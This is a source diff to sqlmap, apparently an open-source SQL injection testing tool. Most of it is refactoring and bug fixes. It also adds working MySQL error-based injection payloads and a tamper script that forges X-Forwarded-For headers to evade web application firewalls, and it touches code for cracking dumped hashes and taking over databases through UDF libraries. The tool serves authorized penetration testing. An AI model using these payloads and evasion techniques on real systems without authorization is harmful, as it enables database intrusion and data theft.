kb.locks.io.release()
|
||||
|
@ -257,9 +257,9 @@ def columnExists(columnFile, regex=None):
|
|||
result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column)))
|
||||
|
||||
if result:
|
||||
columns[column] = 'numeric'
|
||||
columns[column] = "numeric"
|
||||
else:
|
||||
columns[column] = 'non-numeric'
|
||||
columns[column] = "non-numeric"
|
||||
|
||||
kb.data.cachedColumns[conf.db] = {conf.tbl: columns}
|
||||
|
||||
|
|
|
@ -98,7 +98,7 @@ def dnsUse(payload, expression):
|
|||
retVal = output
|
||||
|
||||
if kb.dnsTest is not None:
|
||||
dataToStdout("[%s] [INFO] %s: %s\r\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output)))
|
||||
dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output)))
|
||||
|
||||
if count > 0:
|
||||
hashDBWrite(expression, output)
|
||||
|
|
|
@ -74,7 +74,7 @@ def _oneShotErrorUse(expression, field=None):
|
|||
try:
|
||||
while True:
|
||||
check = "%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
|
||||
trimcheck = "%s(?P<result>.*?)</" % (kb.chars.start)
|
||||
trimcheck = "%s(?P<result>[^<]*)" % (kb.chars.start)
|
||||
|
||||
if field:
|
||||
nulledCastedField = agent.nullAndCastField(field)
|
||||
|
@ -130,6 +130,10 @@ def _oneShotErrorUse(expression, field=None):
|
|||
warnMsg += safecharencode(trimmed)
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if not kb.testMode:
|
||||
check = "(?P<result>.*?)%s" % kb.chars.stop[:2]
|
||||
output = extractRegexResult(check, trimmed, re.IGNORECASE)
|
||||
|
||||
if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)):
|
||||
if offset == 1:
|
||||
retVal = output
|
||||
|
|
|
@ -322,7 +322,7 @@ def unionUse(expression, unpack=True, dump=False):
|
|||
if len(status) > width:
|
||||
status = "%s..." % status[:width - 3]
|
||||
|
||||
dataToStdout("%s\r\n" % status, True)
|
||||
dataToStdout("%s\n" % status, True)
|
||||
|
||||
runThreads(numThreads, unionThread)
|
||||
|
||||
|
|
|
@ -164,8 +164,8 @@ class Task(object):
|
|||
shutil.rmtree(self.output_directory)
|
||||
|
||||
def engine_start(self):
|
||||
self.process = Popen("python sqlmap.py --pickled-options %s" % base64pickle(self.options),
|
||||
shell=True, stdin=PIPE, close_fds=False)
|
||||
self.process = Popen(["python", "sqlmap.py", "--pickled-options", base64pickle(self.options)],
|
||||
shell=False, stdin=PIPE, close_fds=False)
|
||||
|
||||
def engine_stop(self):
|
||||
if self.process:
|
||||
|
|
|
@ -5,20 +5,26 @@ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
|||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import codecs
|
||||
import httplib
|
||||
import os
|
||||
import re
|
||||
import urlparse
|
||||
import tempfile
|
||||
import time
|
||||
|
||||
from lib.core.common import clearConsoleLine
|
||||
from lib.core.common import dataToStdout
|
||||
from lib.core.common import findPageForms
|
||||
from lib.core.common import readInput
|
||||
from lib.core.common import safeCSValue
|
||||
from lib.core.common import singleTimeWarnMessage
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import kb
|
||||
from lib.core.data import logger
|
||||
from lib.core.exception import SqlmapConnectionException
|
||||
from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS
|
||||
from lib.core.settings import UNICODE_ENCODING
|
||||
from lib.core.threads import getCurrentThreadData
|
||||
from lib.core.threads import runThreads
|
||||
from lib.request.connect import Connect as Request
|
||||
|
@ -115,9 +121,6 @@ def crawl(target):
|
|||
logger.info(infoMsg)
|
||||
|
||||
for i in xrange(conf.crawlDepth):
|
||||
if i > 0 and conf.threads == 1:
|
||||
singleTimeWarnMessage("running in a single-thread mode. This could take a while")
|
||||
|
||||
threadData.shared.count = 0
|
||||
threadData.shared.length = len(threadData.shared.unprocessed)
|
||||
numThreads = min(conf.threads, len(threadData.shared.unprocessed))
|
||||
|
@ -125,7 +128,7 @@ def crawl(target):
|
|||
if not conf.bulkFile:
|
||||
logger.info("searching for links with depth %d" % (i + 1))
|
||||
|
||||
runThreads(numThreads, crawlThread)
|
||||
runThreads(numThreads, crawlThread, threadChoice=(i>0))
|
||||
clearConsoleLine(True)
|
||||
|
||||
if threadData.shared.deeper:
|
||||
|
@ -146,4 +149,33 @@ def crawl(target):
|
|||
logger.warn(warnMsg)
|
||||
else:
|
||||
for url in threadData.shared.value:
|
||||
kb.targets.add((url, None, None, None))
|
||||
kb.targets.add((url, None, None, None, None))
|
||||
|
||||
storeResultsToFile(kb.targets)
|
||||
|
||||
def storeResultsToFile(results):
|
||||
if not results:
|
||||
return
|
||||
|
||||
if kb.storeCrawlingChoice is None:
|
||||
message = "do you want to store crawling results to a temporary file "
|
||||
message += "for eventual further processing with other tools [y/N] "
|
||||
test = readInput(message, default="N")
|
||||
kb.storeCrawlingChoice = test[0] in ("y", "Y")
|
||||
|
||||
if kb.storeCrawlingChoice:
|
||||
handle, filename = tempfile.mkstemp(prefix="sqlmapcrawling-", suffix=".csv" if conf.forms else ".txt")
|
||||
os.close(handle)
|
||||
|
||||
infoMsg = "writing crawling results to a temporary file '%s' " % filename
|
||||
logger.info(infoMsg)
|
||||
|
||||
with codecs.open(filename, "w+b", UNICODE_ENCODING) as f:
|
||||
if conf.forms:
|
||||
f.write("URL,POST\n")
|
||||
|
||||
for url, _, data, _, _ in results:
|
||||
if conf.forms:
|
||||
f.write("%s,%s\n" % (safeCSValue(url), safeCSValue(data or "")))
|
||||
else:
|
||||
f.write("%s\n" % url)
|
||||
|
|
|
@ -46,10 +46,8 @@ class Google(object):
|
|||
try:
|
||||
conn = self.opener.open("http://www.google.com/ncr")
|
||||
conn.info() # retrieve session cookie
|
||||
except urllib2.HTTPError, e:
|
||||
e.info()
|
||||
except urllib2.URLError:
|
||||
errMsg = "unable to connect to Google"
|
||||
except Exception, ex:
|
||||
errMsg = "unable to connect to Google ('%s')" % ex
|
||||
raise SqlmapConnectionException(errMsg)
|
||||
|
||||
def search(self, dork):
|
||||
|
@ -154,7 +152,7 @@ class Google(object):
|
|||
warnMsg += "to get error page information (%d)" % e.code
|
||||
logger.critical(warnMsg)
|
||||
return None
|
||||
except (urllib2.URLError, socket.error, socket.timeout):
|
||||
except:
|
||||
errMsg = "unable to connect to DuckDuckGo"
|
||||
raise SqlmapConnectionException(errMsg)
|
||||
|
||||
|
|
|
@ -69,6 +69,7 @@ from lib.core.settings import NULL
|
|||
from lib.core.settings import UNICODE_ENCODING
|
||||
from lib.core.settings import ROTATING_CHARS
|
||||
from lib.core.wordlist import Wordlist
|
||||
from thirdparty.colorama.initialise import init as coloramainit
|
||||
from thirdparty.pydes.pyDes import des
|
||||
from thirdparty.pydes.pyDes import CBC
|
||||
|
||||
|
@ -508,6 +509,9 @@ def hashRecognition(value):
|
|||
return retVal
|
||||
|
||||
def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist):
|
||||
if IS_WIN:
|
||||
coloramainit()
|
||||
|
||||
count = 0
|
||||
rotator = 0
|
||||
hashes = set([item[0][1] for item in attack_info])
|
||||
|
@ -581,6 +585,9 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc
|
|||
proc_count.value -= 1
|
||||
|
||||
def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist):
|
||||
if IS_WIN:
|
||||
coloramainit()
|
||||
|
||||
count = 0
|
||||
rotator = 0
|
||||
|
||||
|
@ -665,7 +672,7 @@ def dictionaryAttack(attack_dict):
|
|||
if not hash_:
|
||||
continue
|
||||
|
||||
hash_ = hash_.split()[0]
|
||||
hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_
|
||||
regex = hashRecognition(hash_)
|
||||
|
||||
if regex and regex not in hash_regexes:
|
||||
|
@ -682,7 +689,7 @@ def dictionaryAttack(attack_dict):
|
|||
if not hash_:
|
||||
continue
|
||||
|
||||
hash_ = hash_.split()[0]
|
||||
hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_
|
||||
|
||||
if re.match(hash_regex, hash_):
|
||||
item = None
|
||||
|
@ -750,6 +757,8 @@ def dictionaryAttack(attack_dict):
|
|||
else:
|
||||
logger.info("using default dictionary")
|
||||
|
||||
dictPaths = filter(None, dictPaths)
|
||||
|
||||
for dictPath in dictPaths:
|
||||
checkFile(dictPath)
|
||||
|
||||
|
|
|
@ -64,7 +64,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
|
|||
colList = filter(None, sorted(colList, key=lambda x: len(x) if x else MAX_INT))
|
||||
|
||||
if conf.pivotColumn:
|
||||
if any(re.search(r"(.+\.)?%s" % conf.pivotColumn, _, re.I) for _ in colList):
|
||||
if any(re.search(r"(.+\.)?%s" % re.escape(conf.pivotColumn), _, re.I) for _ in colList):
|
||||
infoMsg = "using column '%s' as a pivot " % conf.pivotColumn
|
||||
infoMsg += "for retrieving row data"
|
||||
logger.info(infoMsg)
|
||||
|
@ -173,7 +173,7 @@ def whereQuery(query):
|
|||
prefix, suffix = query.split(" ORDER BY ") if " ORDER BY " in query else (query, "")
|
||||
|
||||
if "%s)" % conf.tbl.upper() in prefix.upper():
|
||||
prefix = re.sub(r"(?i)%s\)" % conf.tbl, "%s WHERE %s)" % (conf.tbl, conf.dumpWhere), prefix)
|
||||
prefix = re.sub(r"(?i)%s\)" % re.escape(conf.tbl), "%s WHERE %s)" % (conf.tbl, conf.dumpWhere), prefix)
|
||||
elif re.search(r"(?i)\bWHERE\b", prefix):
|
||||
prefix += " AND %s" % conf.dumpWhere
|
||||
else:
|
||||
|
|
|
@ -14,6 +14,7 @@ from lib.core.common import isNoneValue
|
|||
from lib.core.common import isNumPosStrValue
|
||||
from lib.core.common import isTechniqueAvailable
|
||||
from lib.core.common import safeSQLIdentificatorNaming
|
||||
from lib.core.common import unArrayizeValue
|
||||
from lib.core.common import unsafeSQLIdentificatorNaming
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import kb
|
||||
|
@ -49,6 +50,8 @@ class Enumeration(GenericEnumeration):
|
|||
users = kb.data.cachedUsers
|
||||
|
||||
for user in users:
|
||||
user = unArrayizeValue(user)
|
||||
|
||||
if user is None:
|
||||
continue
|
||||
|
||||
|
|
|
@ -5,6 +5,7 @@ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
|||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import os
|
||||
import re
|
||||
|
||||
from lib.core.agent import agent
|
||||
|
@ -78,10 +79,10 @@ class Takeover(GenericTakeover):
|
|||
self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)
|
||||
|
||||
if Backend.isOs(OS.WINDOWS):
|
||||
self.udfLocalFile += "/mysql/windows/%d/lib_mysqludf_sys.dll" % Backend.getArch()
|
||||
self.udfLocalFile = os.path.join(self.udfLocalFile, "mysql", "windows", "%d" % Backend.getArch(), "lib_mysqludf_sys.dll")
|
||||
self.udfSharedLibExt = "dll"
|
||||
else:
|
||||
self.udfLocalFile += "/mysql/linux/%d/lib_mysqludf_sys.so" % Backend.getArch()
|
||||
self.udfLocalFile = os.path.join(self.udfLocalFile, "mysql", "linux", "%d" % Backend.getArch(), "lib_mysqludf_sys.so")
|
||||
self.udfSharedLibExt = "so"
|
||||
|
||||
def udfCreateFromSharedLib(self, udf, inpRet):
|
||||
|
|
|
@ -5,6 +5,8 @@ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
|||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import os
|
||||
|
||||
from lib.core.common import Backend
|
||||
from lib.core.common import randomStr
|
||||
from lib.core.data import kb
|
||||
|
@ -58,10 +60,10 @@ class Takeover(GenericTakeover):
|
|||
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||
|
||||
if Backend.isOs(OS.WINDOWS):
|
||||
self.udfLocalFile += "/postgresql/windows/%d/%s/lib_postgresqludf_sys.dll" % (Backend.getArch(), majorVer)
|
||||
self.udfLocalFile = os.path.join(self.udfLocalFile, "postgresql", "windows", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.dll")
|
||||
self.udfSharedLibExt = "dll"
|
||||
else:
|
||||
self.udfLocalFile += "/postgresql/linux/%d/%s/lib_postgresqludf_sys.so" % (Backend.getArch(), majorVer)
|
||||
self.udfLocalFile = os.path.join(self.udfLocalFile, "postgresql", "linux", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.so")
|
||||
self.udfSharedLibExt = "so"
|
||||
|
||||
def udfCreateFromSharedLib(self, udf, inpRet):
|
||||
|
|
|
@ -6,12 +6,13 @@ See the file 'doc/COPYING' for copying permission
|
|||
"""
|
||||
|
||||
import re
|
||||
import sys
|
||||
|
||||
from lib.core.common import Backend
|
||||
from lib.core.common import dataToStdout
|
||||
from lib.core.common import getSQLSnippet
|
||||
from lib.core.common import getUnicode
|
||||
from lib.core.common import isStackingAvailable
|
||||
from lib.core.convert import utf8decode
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import logger
|
||||
from lib.core.dicts import SQL_STATEMENTS
|
||||
|
@ -81,7 +82,7 @@ class Custom:
|
|||
|
||||
try:
|
||||
query = raw_input("sql-shell> ")
|
||||
query = utf8decode(query)
|
||||
query = getUnicode(query, encoding=sys.stdin.encoding)
|
||||
except KeyboardInterrupt:
|
||||
print
|
||||
errMsg = "user aborted"
|
||||
|
|
|
@ -147,7 +147,7 @@ class Entries:
|
|||
for column in colList:
|
||||
_ = agent.preprocessField(tbl, column)
|
||||
if _ != column:
|
||||
colString = re.sub(r"\b%s\b" % column, _, colString)
|
||||
colString = re.sub(r"\b%s\b" % re.escape(column), _, colString)
|
||||
|
||||
entriesCount = 0
|
||||
|
||||
|
@ -337,12 +337,17 @@ class Entries:
|
|||
kb.data.dumpedTable["__infos__"] = {"count": entriesCount,
|
||||
"table": safeSQLIdentificatorNaming(tbl, True),
|
||||
"db": safeSQLIdentificatorNaming(conf.db)}
|
||||
attackDumpedTable()
|
||||
try:
|
||||
attackDumpedTable()
|
||||
except (IOError, OSError), ex:
|
||||
errMsg = "an error occurred while attacking "
|
||||
errMsg += "table dump ('%s')" % ex
|
||||
logger.critical(errMsg)
|
||||
conf.dumper.dbTableValues(kb.data.dumpedTable)
|
||||
|
||||
except SqlmapConnectionException, e:
|
||||
errMsg = "connection exception detected in dumping phase: "
|
||||
errMsg += "'%s'" % e
|
||||
except SqlmapConnectionException, ex:
|
||||
errMsg = "connection exception detected in dumping phase "
|
||||
errMsg += "('%s')" % ex
|
||||
logger.critical(errMsg)
|
||||
|
||||
finally:
|
||||
|
|
|
@ -261,7 +261,7 @@ class Search:
|
|||
if tblConsider == "2":
|
||||
continue
|
||||
else:
|
||||
for db in conf.db.split(","):
|
||||
for db in conf.db.split(",") if conf.db else (self.getCurrentDb(),):
|
||||
db = safeSQLIdentificatorNaming(db)
|
||||
if db not in foundTbls:
|
||||
foundTbls[db] = []
|
||||
|
@ -501,7 +501,7 @@ class Search:
|
|||
if db not in foundCols[column]:
|
||||
foundCols[column][db] = []
|
||||
else:
|
||||
for db in conf.db.split(","):
|
||||
for db in conf.db.split(",") if conf.db else (self.getCurrentDb(),):
|
||||
db = safeSQLIdentificatorNaming(db)
|
||||
if db not in foundCols[column]:
|
||||
foundCols[column][db] = []
|
||||
|
|
|
@ -101,7 +101,9 @@ class Users:
|
|||
values = inject.getValue(query, blind=False, time=False)
|
||||
|
||||
if not isNoneValue(values):
|
||||
kb.data.cachedUsers = arrayizeValue(values)
|
||||
kb.data.cachedUsers = []
|
||||
for value in arrayizeValue(values):
|
||||
kb.data.cachedUsers.append(unArrayizeValue(value))
|
||||
|
||||
if not kb.data.cachedUsers and isInferenceAvailable() and not conf.direct:
|
||||
infoMsg = "fetching number of database users"
|
||||
|
|
21
sqlmap.conf
21
sqlmap.conf
|
@ -40,31 +40,34 @@ sitemapUrl =
|
|||
# These options can be used to specify how to connect to the target URL.
|
||||
[Request]
|
||||
|
||||
# Force usage of given HTTP method (e.g. PUT).
|
||||
method =
|
||||
|
||||
# Data string to be sent through POST.
|
||||
data =
|
||||
|
||||
# Character used for splitting parameter values
|
||||
# Character used for splitting parameter values.
|
||||
paramDel =
|
||||
|
||||
# HTTP Cookie header value.
|
||||
cookie =
|
||||
|
||||
# Character used for splitting cookie values
|
||||
# Character used for splitting cookie values.
|
||||
cookieDel =
|
||||
|
||||
# File containing cookies in Netscape/wget format
|
||||
# File containing cookies in Netscape/wget format.
|
||||
loadCookies =
|
||||
|
||||
# Ignore Set-Cookie header from response
|
||||
# Ignore Set-Cookie header from response.
|
||||
# Valid: True or False
|
||||
dropSetCookie = False
|
||||
|
||||
# HTTP User-Agent header value. Useful to fake the HTTP User-Agent header value
|
||||
# at each HTTP request
|
||||
# at each HTTP request.
|
||||
# sqlmap will also test for SQL injection on the HTTP User-Agent value.
|
||||
agent =
|
||||
|
||||
# Use randomly selected HTTP User-Agent header value
|
||||
# Use randomly selected HTTP User-Agent header value.
|
||||
# Valid: True or False
|
||||
randomAgent = False
|
||||
|
||||
|
@ -158,6 +161,12 @@ saFreq = 0
|
|||
# Valid: True or False
|
||||
skipUrlEncode = False
|
||||
|
||||
# Parameter used to hold anti-CSRF token
|
||||
csrfToken =
|
||||
|
||||
# URL address to visit to extract anti-CSRF token
|
||||
csrfUrl =
|
||||
|
||||
# Force usage of SSL/HTTPS
|
||||
# Valid: True or False
|
||||
forceSSL = False
|
||||
|
|
21
sqlmap.py
21
sqlmap.py
|
@ -9,6 +9,7 @@ import bdb
|
|||
import inspect
|
||||
import logging
|
||||
import os
|
||||
import re
|
||||
import sys
|
||||
import time
|
||||
import traceback
|
||||
|
@ -21,8 +22,10 @@ from lib.utils import versioncheck # this has to be the first non-standard impo
|
|||
|
||||
from lib.controller.controller import start
|
||||
from lib.core.common import banner
|
||||
from lib.core.common import createGithubIssue
|
||||
from lib.core.common import dataToStdout
|
||||
from lib.core.common import getUnicode
|
||||
from lib.core.common import maskSensitiveData
|
||||
from lib.core.common import setColor
|
||||
from lib.core.common import setPaths
|
||||
from lib.core.common import weAreFrozen
|
||||
|
@ -127,9 +130,22 @@ def main():
|
|||
except:
|
||||
print
|
||||
errMsg = unhandledExceptionMessage()
|
||||
excMsg = traceback.format_exc()
|
||||
|
||||
for match in re.finditer(r'File "(.+?)", line', excMsg):
|
||||
file_ = match.group(1)
|
||||
file_ = os.path.relpath(file_, os.path.dirname(__file__))
|
||||
file_ = file_.replace("\\", '/')
|
||||
file_ = re.sub(r"\.\./", '/', file_).lstrip('/')
|
||||
excMsg = excMsg.replace(match.group(1), file_)
|
||||
|
||||
errMsg = maskSensitiveData(errMsg)
|
||||
excMsg = maskSensitiveData(excMsg)
|
||||
|
||||
logger.critical(errMsg)
|
||||
kb.stickyLevel = logging.CRITICAL
|
||||
dataToStdout(setColor(traceback.format_exc()))
|
||||
dataToStdout(excMsg)
|
||||
createGithubIssue(errMsg, excMsg)
|
||||
|
||||
finally:
|
||||
if conf.get("showTime"):
|
||||
|
@ -156,6 +172,9 @@ def main():
|
|||
except KeyboardInterrupt:
|
||||
pass
|
||||
|
||||
if conf.get("dumper"):
|
||||
conf.dumper.flush()
|
||||
|
||||
# Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program
|
||||
if conf.get("threads", 0) > 1 or conf.get("dnsServer"):
|
||||
os._exit(0)
|
||||
|
|
|
@ -44,10 +44,14 @@ def tamper(payload, **kwargs):
|
|||
word = match.group()
|
||||
|
||||
if word.upper() in kb.keywords:
|
||||
_ = str()
|
||||
while True:
|
||||
_ = ""
|
||||
|
||||
for i in xrange(len(word)):
|
||||
_ += word[i].upper() if randomRange(0, 1) else word[i].lower()
|
||||
for i in xrange(len(word)):
|
||||
_ += word[i].upper() if randomRange(0, 1) else word[i].lower()
|
||||
|
||||
if len(_) > 1 and _ not in (_.lower(), _.upper()):
|
||||
break
|
||||
|
||||
retVal = retVal.replace(word, _)
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ def dependencies():
|
|||
|
||||
def tamper(payload, **kwargs):
|
||||
"""
|
||||
Append a HTTP Request Parameter to bypass
|
||||
Append a HTTP header 'X-originating-IP' to bypass
|
||||
WAF Protection of Varnish Firewall
|
||||
|
||||
Notes:
|
||||
|
|
29
tamper/xforwardedfor.py
Normal file
29
tamper/xforwardedfor.py
Normal file
|
@ -0,0 +1,29 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.enums import PRIORITY
|
||||
from random import sample
|
||||
__priority__ = PRIORITY.NORMAL
|
||||
|
||||
def dependencies():
|
||||
pass
|
||||
|
||||
def randomIP():
|
||||
numbers = []
|
||||
while not numbers or numbers[0] in (10, 172, 192):
|
||||
numbers = sample(xrange(1, 255), 4)
|
||||
return '.'.join(str(_) for _ in numbers)
|
||||
|
||||
def tamper(payload, **kwargs):
|
||||
"""
|
||||
Append a fake HTTP header 'X-Forwarded-For' to bypass
|
||||
WAF (usually application based) protection
|
||||
"""
|
||||
|
||||
headers = kwargs.get("headers", {})
|
||||
headers["X-Forwarded-For"] = randomIP()
|
||||
return payload
|
2
thirdparty/ansistrm/ansistrm.py
vendored
2
thirdparty/ansistrm/ansistrm.py
vendored
|
@ -62,6 +62,8 @@ class ColorizingStreamHandler(logging.StreamHandler):
|
|||
self.flush()
|
||||
except (KeyboardInterrupt, SystemExit):
|
||||
raise
|
||||
except IOError:
|
||||
pass
|
||||
except:
|
||||
self.handleError(record)
|
||||
|
||||
|
|
|
@ -23,9 +23,9 @@
|
|||
<dbms value="Microsoft SQL Server">
|
||||
<error regexp="Driver.* SQL[\-\_\ ]*Server"/>
|
||||
<error regexp="OLE DB.* SQL Server"/>
|
||||
<error regexp="(\W|\A)SQL Server.*Driver"/>
|
||||
<error regexp="\bSQL Server.*Driver"/>
|
||||
<error regexp="Warning.*mssql_.*"/>
|
||||
<error regexp="(\W|\A)SQL Server.*[0-9a-fA-F]{8}"/>
|
||||
<error regexp="\bSQL Server.*[0-9a-fA-F]{8}"/>
|
||||
<error regexp="(?s)Exception.*\WSystem\.Data\.SqlClient\."/>
|
||||
<error regexp="(?s)Exception.*\WRoadhouse\.Cms\."/>
|
||||
</dbms>
|
||||
|
@ -39,7 +39,7 @@
|
|||
|
||||
<!-- Oracle -->
|
||||
<dbms value="Oracle">
|
||||
<error regexp="ORA-[0-9][0-9][0-9][0-9]"/>
|
||||
<error regexp="\bORA-[0-9][0-9][0-9][0-9]"/>
|
||||
<error regexp="Oracle error"/>
|
||||
<error regexp="Oracle.*Driver"/>
|
||||
<error regexp="Warning.*\Woci_.*"/>
|
||||
|
|
|
@ -1252,6 +1252,26 @@ Formats:
|
|||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.5 AND error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
|
||||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
|
||||
<request>
|
||||
<payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.5</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 4.1 AND error-based - WHERE or HAVING clause</title>
|
||||
<stype>2</stype>
|
||||
|
@ -1470,6 +1490,26 @@ Formats:
|
|||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
|
||||
<stype>2</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
|
||||
<request>
|
||||
<payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.5</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 4.1 OR error-based - WHERE or HAVING clause</title>
|
||||
<stype>2</stype>
|
||||
|
@ -1715,6 +1755,26 @@ Formats:
|
|||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)</title>
|
||||
<stype>2</stype>
|
||||
<level>5</level>
|
||||
<risk>0</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
|
||||
<request>
|
||||
<payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.5</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>PostgreSQL error-based - Parameter replace</title>
|
||||
<stype>2</stype>
|
||||
|
@ -1877,6 +1937,26 @@ Formats:
|
|||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.5 error-based - GROUP BY and ORDER BY clauses (BIGINT UNSIGNED)</title>
|
||||
<stype>2</stype>
|
||||
<level>5</level>
|
||||
<risk>0</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
|
||||
<request>
|
||||
<payload>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.5</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title>
|
||||
<stype>2</stype>
|
||||
|
|
Loading…
Reference in New Issue
Block a user